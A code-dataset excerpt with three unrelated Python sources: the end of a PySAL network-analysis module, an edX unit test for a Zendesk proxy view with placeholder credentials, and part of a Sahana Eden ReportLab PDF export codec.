Computes a network constrained F-Function
Parameters
----------
pointpattern: object
A PySAL point pattern object.
nsteps: int
The number of steps at which the count of the nearest neighbors
is computed.
permutations: int
The number of permutations to perform (default 99).
threshold: float
The level at which significance is computed.
-- 0.5 would be 97.5% and 2.5%
distribution: str
The distribution from which random points are sampled:
-- uniform or poisson
lowerbound: float
The lower bound at which the F-function is computed. (Default 0)
upperbound: float
The upper bound at which the F-function is computed.
Defaults to the maximum observed nearest neighbor distance.
Returns
-------
NetworkF: object
A network F class instance.
"""
return NetworkF(self, pointpattern, nsteps=nsteps,
permutations=permutations,threshold=threshold,
distribution=distribution,lowerbound=lowerbound,
upperbound=upperbound)
def NetworkG(self, pointpattern, nsteps=10, permutations=99,
threshold=0.5, distribution='uniform',
lowerbound=None, upperbound=None):
"""
Computes a network constrained G-Function
Parameters
----------
pointpattern: object
A PySAL point pattern object.
nsteps: int
The number of steps at which the count of the nearest neighbors
is computed.
permutations: int
The number of permutations to perform (default 99).
threshold: float
The level at which significance is computed.
-- 0.5 would be 97.5% and 2.5%
distribution: str
The distribution from which random points are sampled:
-- uniform or poisson
lowerbound: float
The lower bound at which the G-function is computed. (Default 0)
upperbound: float
The upper bound at which the G-function is computed.
Defaults to the maximum observed nearest neighbor distance.
Returns
-------
NetworkG: object
A network G class instance.
"""
return NetworkG(self, pointpattern, nsteps=nsteps,
permutations=permutations,threshold=threshold,
distribution=distribution,lowerbound=lowerbound,
upperbound=upperbound)
def NetworkK(self, pointpattern, nsteps=10, permutations=99,
threshold=0.5, distribution='uniform',
lowerbound=None, upperbound=None):
"""
Computes a network constrained K-Function
Parameters
----------
pointpattern: object
A PySAL point pattern object.
nsteps: int
The number of steps at which the count of the nearest neighbors
is computed.
permutations: int
The number of permutations to perform (default 99).
threshold: float
The level at which significance is computed.
-- 0.5 would be 97.5% and 2.5%
distribution: str
The distribution from which random points are sampled:
-- uniform or poisson
lowerbound: float
The lower bound at which the K-function is computed. (Default 0)
upperbound: float
The upper bound at which the K-function is computed.
Defaults to the maximum observed nearest neighbor distance.
Returns
-------
NetworkK: object
A network K class instance.
"""
return NetworkK(self, pointpattern, nsteps=nsteps,
permutations=permutations,threshold=threshold,
distribution=distribution,lowerbound=lowerbound,
upperbound=upperbound)
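    # A minimal usage sketch for the F/G/K wrappers (assumes the snapped 'crimes'
    # pattern; a small permutations value keeps the envelope computation fast):
    #   kres = ntw.NetworkK(ntw.pointpatterns['crimes'], permutations=9)
    #   # kres bundles the observed statistic and the simulation envelopes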
def segment_edges(self, distance):
"""
Segment all of the edges in the network at either a fixed distance or a fixed
number of segments.
Parameters
-----------
distance: float
The distance at which edges are split.
Returns
-------
sn: object
PySAL Network Object.
Example
-------
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> n200 = ntw.segment_edges(200.0)
>>> len(n200.edges)
688
"""
sn = Network()
sn.adjacencylist = copy.deepcopy(self.adjacencylist)
sn.edge_lengths = copy.deepcopy(self.edge_lengths)
sn.edges = set(copy.deepcopy(self.edges))
sn.node_coords = copy.deepcopy(self.node_coords)
sn.node_list = copy.deepcopy(self.node_list)
sn.nodes = copy.deepcopy(self.nodes)
sn.pointpatterns = copy.deepcopy(self.pointpatterns)
sn.in_shp = self.in_shp
current_node_id = max(self.nodes.values())
newedges = set()
removeedges = set()
for e in sn.edges:
length = sn.edge_lengths[e]
interval = distance
totallength = 0
currentstart = startnode = e[0]
endnode = e[1]
# If the edge will be segmented remove the current edge from the adjacency list.
if interval < length:
sn.adjacencylist[e[0]].remove(e[1])
sn.adjacencylist[e[1]].remove(e[0])
sn.edge_lengths.pop(e, None)
removeedges.add(e)
else:
continue
while totallength < length:
currentstop = current_node_id
if totallength + interval > length:
currentstop = endnode
interval = length - totallength
totallength = length
else:
current_node_id += 1
currentstop = current_node_id
totallength += interval
# Compute the new node coordinate.
newx, newy = self._newpoint_coords(e, totallength)
# Update node_list.
if currentstop not in sn.node_list:
sn.node_list.append(currentstop)
# Update nodes and node_coords.
sn.node_coords[currentstop] = newx, newy
sn.nodes[(newx, newy)] = currentstop
# Update the adjacency list.
sn.adjacencylist[currentstart].append(currentstop)
sn.adjacencylist[currentstop].append(currentstart)
# Add the new edge to the edge dict.
# Iterating over this so we need to add after iterating.
newedges.add(tuple(sorted([currentstart, currentstop])))
# Modify edge_lengths.
sn.edge_lengths[tuple(sorted([currentstart, currentstop]))] = interval
# Increment the start to the stop.
currentstart = currentstop
sn.edges.update(newedges)
sn.edges.difference_update(removeedges)
sn.edges = list(sn.edges)
# Update the point pattern snapping.
for instance in sn.pointpatterns.itervalues():
sn._snap_to_edge(instance)
return sn
def savenetwork(self, filename):
"""
Save a network to disk as a binary file
Parameters
----------
filename: str
            The filename where the network should be saved. This should be a full
            path, otherwise the file is saved wherever this method is called from.
Example
--------
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> ntw.savenetwork('mynetwork.pkl')
"""
with open(filename, 'wb') as networkout:
cPickle.dump(self, networkout, protocol=2)
@staticmethod
def loadnetwork(filename):
with open(filename, 'rb') as networkin:
self = cPickle.load(networkin)
return self
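    # A minimal save/load round-trip sketch (writes the pickle into the current
    # working directory):
    #   ntw.savenetwork('mynetwork.pkl')
    #   ntw2 = Network.loadnetwork('mynetwork.pkl')
    #   len(ntw2.edges) == len(ntw.edges)   # True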
class PointPattern():
"""
A stub point pattern class used to store a point pattern. This class is monkey patched
with network specific attributes when the points are snapped to a network.
In the future this class may be replaced with a generic point
pattern class.
Parameters
----------
shapefile: str
The input shapefile.
idvariable: str
Field in the shapefile to use as an id variable.
attribute: bool
{False, True}
A flag to indicate whether all attributes are tagged to this class.
Attributes
----------
points: dict
Keys are the point ids.
Values are the coordinates.
npoints: int
The number of points.
"""
def __init__(self, shapefile, idvariable=None, attribute=False):
self.points = {}
self.npoints = 0
if idvariable:
ids = get_ids(shapefile, idvariable)
else:
ids = None
pts = ps.open(shapefile)
# Get attributes if requested
if attribute == True:
dbname = os.path.splitext(shapefile)[0] + '.dbf'
db = ps.open(dbname)
else:
db = None
for i, pt in enumerate(pts):
if ids and db:
self.points[ids[i]] = {'coordinates':pt, 'properties':db[i]}
elif ids and not db:
self.points[ids[i]] = {'coordinates':pt, 'properties':None}
elif not ids and db:
self.points[i] = {'coordinates':pt, 'properties':db[i]}
else:
self.points[i] = {'coordinates':pt, 'properties':None}
pts.close()
if db:
db.close()
self.npoints = len(self.points.keys())
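    # A minimal construction sketch (assumes the PySAL example data are available):
    #   pp = PointPattern(ps.examples.get_path('crimes.shp'), attribute=True)
    #   pp.npoints                      # number of points read from the shapefile
    #   pp.points[0]['coordinates']     # raw point geometry of the first record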
class SimulatedPointPattern():
"""
Struct style class to mirror the Point Pattern Class.
If the PointPattern class has methods, it might make sense to
make this a child of that class.
This class is not intended to be used by the external user.
"""
def __init__(self):
self.npoints = 0
self.obs_to_edge = {}
self.obs_to_node = defaultdict(list)
self.dist_to_node = {}
self.snapped_coordinates = {}
class SortedEdges(OrderedDict):
def next_key(self, key):
next = self._OrderedDict__map[key][1]
if next is self._OrderedDict__root:
raise ValueError("{!r} is the last key.".format(key))
return next[2]
def first_key(self):
for key in self: return key
raise ValueError("No sorted edges remain.")
| bsd-3-clause | 1,811,475,940,539,009,500 | 34.225482 | 102 | 0.519608 | false |
edx-solutions/edx-platform | openedx/core/djangoapps/zendesk_proxy/tests/test_v0_views.py | 4 | 3905 | """Tests for zendesk_proxy views."""
from copy import deepcopy
import json
import ddt
from django.urls import reverse
from django.test.utils import override_settings
from mock import MagicMock, patch
import six
from six.moves import range
from openedx.core.djangoapps.zendesk_proxy.v0.views import ZENDESK_REQUESTS_PER_HOUR
from openedx.core.lib.api.test_utils import ApiTestCase
@ddt.ddt
@override_settings(
ZENDESK_URL="https://www.superrealurlsthataredefinitelynotfake.com",
ZENDESK_OAUTH_ACCESS_TOKEN="abcdefghijklmnopqrstuvwxyz1234567890"
)
class ZendeskProxyTestCase(ApiTestCase):
"""Tests for zendesk_proxy views."""
def setUp(self):
self.url = reverse('zendesk_proxy_v0')
self.request_data = {
'name': 'John Q. Student',
'tags': ['python_unit_test'],
'email': {
'from': '[email protected]',
'subject': 'Python Unit Test Help Request',
'message': "Help! I'm trapped in a unit test factory and I can't get out!",
}
}
return super(ZendeskProxyTestCase, self).setUp()
def test_post(self):
with patch('requests.post', return_value=MagicMock(status_code=201)) as mock_post:
response = self.request_without_auth(
'post',
self.url,
data=json.dumps(self.request_data),
content_type='application/json'
)
self.assertHttpCreated(response)
(mock_args, mock_kwargs) = mock_post.call_args
self.assertEqual(mock_args, ('https://www.superrealurlsthataredefinitelynotfake.com/api/v2/tickets.json',))
six.assertCountEqual(self, mock_kwargs.keys(), ['headers', 'data'])
self.assertEqual(
mock_kwargs['headers'],
{
'content-type': 'application/json',
'Authorization': 'Bearer abcdefghijklmnopqrstuvwxyz1234567890'
}
)
self.assertEqual(
json.loads(mock_kwargs['data']),
{
'ticket': {
'comment': {
'body': "Help! I'm trapped in a unit test factory and I can't get out!",
'uploads': None,
},
'custom_fields': None,
'requester': {
'email': '[email protected]',
'name': 'John Q. Student',
},
'subject': 'Python Unit Test Help Request',
'tags': ['python_unit_test'],
},
}
)
@ddt.data('name', 'tags', 'email')
def test_bad_request(self, key_to_delete):
test_data = deepcopy(self.request_data)
_ = test_data.pop(key_to_delete)
response = self.request_without_auth(
'post',
self.url,
data=json.dumps(test_data),
content_type='application/json'
)
self.assertHttpBadRequest(response)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'zendesk_proxy',
}
}
)
def test_rate_limiting(self):
"""
Confirm rate limits work as expected. Note that drf's rate limiting makes use of the default cache to enforce
limits; that's why this test needs a "real" default cache (as opposed to the usual-for-tests DummyCache)
"""
for _ in range(ZENDESK_REQUESTS_PER_HOUR):
self.request_without_auth('post', self.url)
response = self.request_without_auth('post', self.url)
self.assertEqual(response.status_code, 429)
| agpl-3.0 | -3,823,738,162,767,136,300 | 35.839623 | 119 | 0.544686 | false |
michaelhowden/eden | modules/s3/s3codecs/pdf.py | 4 | 56741 | # -*- coding: utf-8 -*-
"""
S3 Adobe PDF codec
@copyright: 2011-15 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3RL_PDF",)
try:
from cStringIO import StringIO # Faster, where available
except:
from StringIO import StringIO
from copy import deepcopy
import os
from gluon import *
from gluon import current
from gluon.storage import Storage
from gluon.contenttype import contenttype
from gluon.languages import lazyT
from ..s3codec import S3Codec
from ..s3utils import s3_unicode
# Import the specialist libraries
try:
from PIL import Image
from PIL import ImageOps
from PIL import ImageStat
PILImported = True
except(ImportError):
try:
import Image
import ImageOps
import ImageStat
PILImported = True
except(ImportError):
PILImported = False
try:
from reportlab.lib.enums import TA_CENTER, TA_RIGHT
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfgen import canvas
from reportlab.lib.fonts import tt2ps
from reportlab.rl_config import canvas_basefontname as _baseFontName
from reportlab.platypus import BaseDocTemplate, SimpleDocTemplate, PageTemplate
from reportlab.platypus.frames import Frame
from reportlab.platypus import Spacer, PageBreak, FrameBreak, Paragraph
from reportlab.platypus import Table, TableStyle
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.lib.units import inch
from reportlab.lib.units import cm
from reportlab.lib import colors
from reportlab.lib.colors import Color
from reportlab.lib.pagesizes import A4, LETTER, landscape, portrait
from reportlab.platypus.flowables import Flowable
from reportlab.pdfbase.ttfonts import TTFont
reportLabImported = True
except ImportError:
reportLabImported = False
BaseDocTemplate = object
inch = 72.0
canvas = Storage()
canvas.Canvas = None
PDF_WIDTH = 0
PDF_HEIGHT = 1
def set_fonts(self):
"""
DRY Helper function for all classes which use PDF to set the appropriate Fonts
"""
font_set = current.deployment_settings.get_pdf_export_font()
if font_set:
try:
font_name = font_set[0]
font_name_bold = font_set[1]
folder = current.request.folder
# Requires the font-files at /static/fonts/<font_name>.ttf
pdfmetrics.registerFont(TTFont(font_name, os.path.join(folder,
"static",
"fonts",
"%s.ttf" % font_name)))
pdfmetrics.registerFont(TTFont(font_name_bold, os.path.join(folder,
"static",
"fonts",
"%s.ttf" % font_name_bold)))
except:
current.log.error("%s Font not found: Please install it to see the correct fonts in PDF exports" % font_set[0])
# Use the default "Helvetica" and "Helvetica-Bold"
self.font_name = "Helvetica"
self.font_name_bold = "Helvetica-Bold"
else:
self.font_name = font_name
self.font_name_bold = font_name_bold
else:
# Use the default "Helvetica" and "Helvetica-Bold"
self.font_name = "Helvetica"
self.font_name_bold = "Helvetica-Bold"
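# A minimal configuration sketch (assumption: the deployment setting is exposed
# through get_pdf_export_font() as a (regular, bold) tuple, with matching .ttf
# files under static/fonts/ as the code above requires; the attribute name below
# is illustrative only):
#   settings.L10n.pdf_export_font = ("unifont", "unifontbold")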
# =============================================================================
class S3RL_PDF(S3Codec):
"""
Simple Report Labs PDF format codec
"""
def __init__(self):
"""
Constructor
"""
# Error codes
T = current.T
self.ERROR = Storage(
            PIL_ERROR = "PIL (Python Imaging Library) not installed, images cannot be embedded in the PDF report",
RL_ERROR = "Python needs the ReportLab module installed for PDF export"
)
# Fonts
set_fonts(self)
# -------------------------------------------------------------------------
def encode(self, resource, **attr):
"""
Export data as a PDF document
@param resource: the resource
@param attr: dictionary of keyword arguments, in s3_rest_controller
passed through from the calling controller
@keyword request: the S3Request
@keyword method: "read" to not include a list view when no
component is specified
@keyword list_fields: fields to include in lists
@keyword pdf_componentname: enforce this component
@keyword pdf_groupby: how to group the results
@keyword pdf_orderby: how to sort rows (within any level of grouping)
@keyword pdf_callback: callback to be used rather than request
@keyword pdf_title: the title of the report
@keyword pdf_filename: the filename for the report
@keyword rheader: HTML page header (override by pdf_header)
@keyword rfooter: HTML page footer (override by pdf_footer)
@keyword pdf_header: callback to generate the HTML header
(overrides rheader)
@keyword pdf_footer: callback to generate the HTML footer,
or static HTML (overrides rfooter)
@keyword pdf_header_padding: add this amount of space between
the header and the body
@keyword pdf_footer_padding: add this amount of space between
the body and the footer
@keyword pdf_hide_comments: don't show the comments in a table
@keyword pdf_table_autogrow: Indicates that a table should grow to
fill the available space. Valid values:
H - Horizontal
V - Vertical
B - Both
@keyword pdf_paper_alignment: Portrait (default) or Landscape
@keyword use_colour: True to add colour to the cells. default False
@ToDo: Add Page Numbers in Footer:
http://www.blog.pythonlibrary.org/2013/08/12/reportlab-how-to-add-page-numbers/
"""
if not PILImported:
current.session.warning = self.ERROR.PIL_ERROR
if not reportLabImported:
current.session.error = self.ERROR.RL_ERROR
redirect(URL(extension=""))
# Settings
r = self.r = attr.get("request", None)
self.list_fields = attr.get("list_fields")
self.pdf_groupby = attr.get("pdf_groupby")
self.pdf_orderby = attr.get("pdf_orderby")
self.pdf_hide_comments = attr.get("pdf_hide_comments")
self.table_autogrow = attr.get("pdf_table_autogrow")
self.pdf_header_padding = attr.get("pdf_header_padding", 0)
self.pdf_footer_padding = attr.get("pdf_footer_padding", 0)
# Get the title & filename
now = current.request.now.isoformat()[:19].replace("T", " ")
title = attr.get("pdf_title")
if title == None:
title = "Report"
docTitle = "%s %s" % (title, now)
filename = attr.get("pdf_filename")
if filename is None:
if not isinstance(title, str):
# Must be str not unicode
title = title.encode("utf-8")
filename = "%s_%s.pdf" % (title, now)
elif len(filename) < 5 or filename[-4:] != ".pdf":
# Add extension
filename = "%s.pdf" % filename
self.filename = filename
# Get the Doc Template
paper_size = attr.get("paper_size")
pdf_paper_alignment = attr.get("pdf_paper_alignment", "Portrait")
doc = EdenDocTemplate(title=docTitle,
paper_size = paper_size,
paper_alignment = pdf_paper_alignment)
# Get the header
header_flowable = None
header = attr.get("pdf_header")
if not header:
header = attr.get("rheader")
if header:
header_flowable = self.get_html_flowable(header,
doc.printable_width)
if self.pdf_header_padding:
header_flowable.append(Spacer(1, self.pdf_header_padding))
# Get the footer
footer_flowable = None
footer = attr.get("pdf_footer")
if not footer:
footer = attr.get("rfooter")
if footer:
footer_flowable = self.get_html_flowable(footer,
doc.printable_width)
if self.pdf_footer_padding:
footer_flowable.append(Spacer(1, self.pdf_footer_padding))
# Build report template
# Get data for the body of the text
data = None
body_flowable = None
doc.calc_body_size(header_flowable, footer_flowable)
callback = attr.get("pdf_callback")
pdf_componentname = attr.get("pdf_componentname", None)
if callback:
# Get the document body from the callback
body_flowable = self.get_html_flowable(callback(r),
doc.printable_width)
elif pdf_componentname: # and resource.parent is None:
# Enforce a particular component
resource = current.s3db.resource(r.tablename,
components = [pdf_componentname],
id = r.id)
if pdf_componentname in resource.components:
component = resource.components[pdf_componentname]
body_flowable = self.get_resource_flowable(component, doc)
elif r.component or attr.get("method", "list") != "read":
# Use the requested resource
body_flowable = self.get_resource_flowable(resource, doc)
styleSheet = getSampleStyleSheet()
style = styleSheet["Normal"]
style.fontName = self.font_name
style.fontSize = 9
if not body_flowable:
body_flowable = [Paragraph("", style)]
self.normalstyle = style
# Build the PDF
doc.build(header_flowable,
body_flowable,
footer_flowable,
)
# Return the generated PDF
response = current.response
if response:
disposition = "attachment; filename=\"%s\"" % self.filename
response.headers["Content-Type"] = contenttype(".pdf")
response.headers["Content-disposition"] = disposition
return doc.output.getvalue()
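    # A minimal usage sketch (hypothetical controller context: `r` is the current
    # S3Request and `resource` its S3Resource; the return value is the PDF bytes):
    #   pdf_bytes = S3RL_PDF().encode(resource,
    #                                 request = r,
    #                                 pdf_title = "Asset List",
    #                                 pdf_hide_comments = True)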
# -------------------------------------------------------------------------
def get_html_flowable(self, rules, printable_width):
"""
Function to convert the rules passed in to a flowable.
The rules (for example) could be an rHeader callback
"""
if callable(rules):
# Callback to produce the HTML (e.g. rheader)
r = self.r
# Switch to HTML representation
representation = r.representation
r.representation = "html"
try:
html = rules(r)
except:
html = ""
r.representation = representation
else:
# Static HTML
html = rules
parser = S3html2pdf(pageWidth = printable_width,
exclude_class_list=["tabs"])
result = parser.parse(html)
return result
# -------------------------------------------------------------------------
def get_resource_flowable(self, resource, doc):
"""
Get a list of fields, if the list_fields attribute is provided
then use that to extract the fields that are required, otherwise
use the list of readable fields.
"""
fields = self.list_fields
if fields:
list_fields = [f for f in fields if f != "id"]
else:
            list_fields = [f.name for f in resource.readable_fields()
                           if f.type != "id" and
                           (f.name != "comments" or
                            not self.pdf_hide_comments)]
get_vars = Storage(current.request.get_vars)
get_vars["iColumns"] = len(list_fields)
filter, orderby, left = resource.datatable_filter(list_fields, get_vars)
resource.add_filter(filter)
result = resource.select(list_fields,
left=left,
limit=None,
count=True,
getids=True,
orderby=orderby,
represent=True,
show_links=False)
# Now generate the PDF table
pdf_table = S3PDFTable(doc,
result["rfields"],
result["rows"],
groupby = self.pdf_groupby,
autogrow = self.table_autogrow,
body_height = doc.body_height,
).build()
return pdf_table
# =============================================================================
class EdenDocTemplate(BaseDocTemplate):
"""
The standard document template for eden reports
It allows for the following page templates:
1) First Page
2) Even Page
3) Odd Page
4) Landscape Page
"""
def __init__(self,
title = "Sahana Eden",
margin = (0.5 * inch, # top
0.3 * inch, # left
0.5 * inch, # bottom
0.3 * inch), # right
margin_inside = 0.0 * inch, # used for odd even pages
paper_size = None,
paper_alignment = "Portrait"):
"""
Set up the standard page templates
"""
self.output = StringIO()
self.defaultPage = paper_alignment
if paper_size:
self.paper_size = paper_size
else:
if current.deployment_settings.get_paper_size() == "Letter":
self.paper_size = LETTER
else:
self.paper_size = A4
self.topMargin = margin[0]
self.leftMargin = margin[1]
self.bottomMargin = margin[2]
self.rightMargin = margin[3]
self.insideMargin = margin_inside
BaseDocTemplate.__init__(self,
self.output,
title = title,
leftMargin = self.leftMargin,
rightMargin = self.rightMargin,
topMargin = self.topMargin,
bottomMargin = self.bottomMargin,
)
self.MINIMUM_MARGIN_SIZE = 0.2 * inch
self.body_flowable = None
self._calc()
# -------------------------------------------------------------------------
def get_flowable_size(self, flowable):
"""
Function to return the size a flowable will require
"""
if not flowable:
return (0, 0)
if not isinstance(flowable, list):
flowable = [flowable]
w = 0
h = 0
for f in flowable:
if f:
size = f.wrap(self.printable_width,
self.printable_height)
if size[0] > w:
w = size[PDF_WIDTH]
h += size[PDF_HEIGHT]
return (w, h)
# -------------------------------------------------------------------------
def _calc(self):
if self.defaultPage == "Landscape":
self.pagesize = landscape(self.paper_size)
else:
self.pagesize = portrait(self.paper_size)
BaseDocTemplate._calc(self)
self.height = self.pagesize[PDF_HEIGHT]
self.width = self.pagesize[PDF_WIDTH]
self.printable_width = self.width - \
self.leftMargin - \
self.rightMargin - \
self.insideMargin
self.printable_height = self.height - \
self.topMargin - \
self.bottomMargin
# -------------------------------------------------------------------------
def calc_body_size(self,
header_flowable,
footer_flowable,
):
"""
Helper function to calculate the various sizes of the page
"""
self._calc() # in case we changed margins sizes etc
self.height = self.pagesize[PDF_HEIGHT]
self.width = self.pagesize[PDF_WIDTH]
self.printable_width = self.width - \
self.leftMargin - \
self.rightMargin - \
self.insideMargin
self.printable_height = self.height - \
self.topMargin - \
self.bottomMargin
header_size = self.get_flowable_size(header_flowable)
footer_size = self.get_flowable_size(footer_flowable)
self.header_height = header_size[PDF_HEIGHT]
self.footer_height = footer_size[PDF_HEIGHT]
self.body_height = self.printable_height - \
self.header_height - \
self.footer_height
# -------------------------------------------------------------------------
def build(self,
header_flowable,
body_flowable,
footer_flowable,
canvasmaker=canvas.Canvas):
"""
Build the document using the flowables.
Set up the page templates that the document can use
"""
self.header_flowable = header_flowable
self.body_flowable = body_flowable
self.footer_flowable = footer_flowable
self.calc_body_size(header_flowable,
footer_flowable,
)
showBoundary = 0 # for debugging set to 1, otherwise 0
body_frame = Frame(self.leftMargin,
self.bottomMargin + self.footer_height,
self.printable_width,
self.body_height,
leftPadding = 0,
bottomPadding = 0,
rightPadding = 0,
topPadding = 0,
id = "body",
showBoundary = showBoundary
)
self.body_frame = body_frame
self.normalPage = PageTemplate(id = "Normal",
frames = [body_frame,],
onPage = self.add_page_decorators,
pagesize = self.pagesize
)
# @todo set these page templates up
#self.evenPage = PageTemplate(id="even",
# frames=frame_list,
# onPage=self.onEvenPage,
# pagesize=self.pagesize
# )
#self.oddPage = PageTemplate(id="odd",
# frames=frame_list,
# onPage=self.onOddPage,
# pagesize=self.pagesize
# )
self.landscapePage = PageTemplate(id="Landscape",
frames = [body_frame,],
onPage=self.add_page_decorators,
pagesize=landscape(self.pagesize)
)
if self.defaultPage == "Landscape":
self.addPageTemplates(self.landscapePage)
else:
self.addPageTemplates(self.normalPage)
BaseDocTemplate.build(self, self.body_flowable, canvasmaker=canvasmaker)
# -------------------------------------------------------------------------
def add_page_decorators(self, canvas, doc):
"""
"""
if self.header_flowable:
top = self.bottomMargin + self.printable_height
for flow in self.header_flowable:
height = self.get_flowable_size(flow)[PDF_HEIGHT]
bottom = top - height
flow.drawOn(canvas,
self.leftMargin,
bottom
)
top = bottom
if self.footer_flowable:
top = self.bottomMargin + self.footer_height
for flow in self.footer_flowable:
height = self.get_flowable_size(flow)[PDF_HEIGHT]
bottom = top - height
flow.drawOn(canvas,
self.leftMargin,
bottom
)
top = bottom
# -------------------------------------------------------------------------
def addParagraph(self, text, style=None, append=True):
"""
Method to create a paragraph that may be inserted into the document
@param text: The text for the paragraph
@param append: If True then the paragraph will be stored in the
document flow ready for generating the pdf.
@return The paragraph
This method can return the paragraph rather than inserting into the
document. This is useful if the paragraph needs to be first
inserted in another flowable, before being added to the document.
An example of when this is useful is when large amounts of text
(such as a comment) are added to a cell of a table.
"""
if text != "":
if style == None:
styleSheet = getSampleStyleSheet()
style = styleSheet["Normal"]
para = Paragraph(text, style)
if append and self.body_flowable:
self.body_flowable.append(para)
return para
return ""
# -------------------------------------------------------------------------
def cellStyle(self, style, cell):
"""
Add special styles to the text in a cell
"""
if style == "*GREY":
return [("TEXTCOLOR", cell, cell, colors.lightgrey)]
elif style == "*RED":
return [("TEXTCOLOR", cell, cell, colors.red)]
return []
# -------------------------------------------------------------------------
def addCellStyling(self, table, style):
"""
Add special styles to the text in a table
"""
row = 0
for line in table:
col = 0
for cell in line:
try:
if cell.startswith("*"):
(instruction, sep, text) = cell.partition(" ")
style += self.cellStyle(instruction, (col, row))
table[row][col] = text
except:
pass
col += 1
row += 1
return (table, style)
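    # A minimal standalone sketch of the template (header and footer flowables may
    # be None when they are not needed):
    #   doc = EdenDocTemplate(title="Example", paper_alignment="Portrait")
    #   body = [doc.addParagraph("Hello world", append=False)]
    #   doc.build(None, body, None)
    #   pdf_bytes = doc.output.getvalue()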
# =============================================================================
class S3PDFTable(object):
"""
Class to build a table that can then be placed in a pdf document
        The table will be formatted so that it fits on the page. This class
doesn't need to be called directly. Rather see S3PDF.addTable()
"""
def __init__(self,
document,
rfields,
raw_data,
groupby = None,
hide_comments = False,
autogrow = False,
body_height = 0,
):
"""
Method to create a table object
@param document: A S3PDF object
@param raw_data: A list of rows
@param rfields: A list of field selectors
@param groupby: A field name that is to be used as a sub-group
All the records that share the same pdf_groupby value
will be clustered together
@param hide_comments: Any comment field will be hidden
"""
if current.deployment_settings.get_paper_size() == "Letter":
self.paper_size = LETTER
else:
self.paper_size = A4
# Fonts
set_fonts(self)
self.pdf = document
# @todo: Change the code to use raw_data directly rather than this
# conversion to an ordered list of values
self.rfields = rfields
rdata = []
rappend = rdata.append
for row in raw_data:
data = []
dappend = data.append
for selector in rfields:
value = row[selector.colname]
# Try to convert Web2py elements to ReportLab equivalents
dvalue = None
while True:
if isinstance(value, (basestring, lazyT)):
dvalue = value
elif isinstance(value, IMG):
dvalue = S3html2pdf.parse_img(value, selector.field.uploadfolder)
if dvalue:
dvalue = dvalue[0]
elif isinstance(value, DIV):
if len(value.components) > 0:
value = value.components[0]
continue
else:
dvalue = s3_unicode(value)
else:
dvalue = s3_unicode(value)
break
dappend(dvalue)
rdata.append(data)
self.raw_data = rdata
self.labels = [selector.label for selector in self.rfields]
self.list_fields = [selector.fname for selector in self.rfields]
self.pdf_groupby = groupby
self.hideComments = hide_comments
self.autogrow = autogrow
self.body_height = body_height
self.data = []
self.subheadingList = []
self.subheadingLevel = {}
self.pages = []
self.colWidths = []
self.newColWidth = [] # @todo: remove this (but see presentation)
self.rowHeights = []
self.style = None
# Temp document to test the table size, default to A4 portrait
# @todo: use custom template
# @todo: set pagesize for pdf component not whole document
self.tempDoc = EdenDocTemplate()
#self.tempDoc.setPageTemplates(self.pdf.pageHeader,
# self.pdf.pageFooter)
#self.tempDoc.pagesize = portrait(self.paper_size)
# Set up style constants
self.headerColour = Color(0.73, 0.76, 1)
self.oddColour = Color(0.92, 0.92, 1)
self.evenColour = Color(0.83, 0.84, 1)
self.MIN_COMMENT_COL_WIDTH = 200
self.fontsize = 12
# -------------------------------------------------------------------------
def build(self):
"""
Method to build the table.
@return: A list of Table objects. Normally this will be a list with
just one table object, but if the table needs to be split
across columns then one object per page will be created.
"""
if self.pdf_groupby:
data = self.group_data()
data = [self.labels] + data
elif self.raw_data != None:
data = [self.labels] + self.raw_data
# Only build the table if we have some data
if not data or not (data[0]):
return None
endCol = len(self.labels) - 1
rowCnt = len(data)
self.style = self.tableStyle(0, rowCnt, endCol)
tempTable = Table(data,
repeatRows=1,
style=self.style,
hAlign="LEFT"
)
self.data = data
self.tempDoc.build(None, [tempTable], None)
self.newColWidth = [tempTable._colWidths]
self.rowHeights = [tempTable._rowHeights]
self.pages.append(data)
if not self.tweakDoc(tempTable):
# Need to split the table
self.pages = self.splitTable(tempTable)
return self.presentation()
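    # A minimal usage sketch (assumes `doc` is an EdenDocTemplate and that `rfields`
    # and `rows` come from resource.select(..., represent=True) as in
    # S3RL_PDF.get_resource_flowable above):
    #   flowables = S3PDFTable(doc, rfields, rows).build()
    #   doc.build(None, flowables, None)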
# -------------------------------------------------------------------------
def group_data(self):
"""
"""
groups = self.pdf_groupby.split(",")
newData = []
data = self.raw_data
level = 0
list_fields = self.list_fields
for field in groups:
level += 1
field = field.strip()
# Find the location of field in list_fields
i = 0
rowlength = len(list_fields)
while i < rowlength:
if list_fields[i] == field:
break
i += 1
list_fields = list_fields[0:i] + list_fields[i + 1:]
labels = self.labels[0:i] + self.labels[i + 1:]
self.labels = labels
currentGroup = None
r = 0
for row in data:
if r + 1 in self.subheadingList:
newData.append(row)
r += 1
else:
try:
group = row[i]
if group != currentGroup:
line = [group]
newData.append(line)
r += 1
currentGroup = group
self.subheadingList.append(r)
self.subheadingLevel[r] = level
# All existing subheadings after this point need to
# be shuffled down one place.
for x in range (len(self.subheadingList)):
if self.subheadingList[x] > r:
posn = self.subheadingList[x]
self.subheadingList[x] = posn + 1
oldlevel = self.subheadingLevel[posn]
del self.subheadingLevel[posn]
self.subheadingLevel[posn + 1] = oldlevel
line = row[0:i] + row[i + 1:]
newData.append(line)
r += 1
except:
newData.append(row)
r += 1
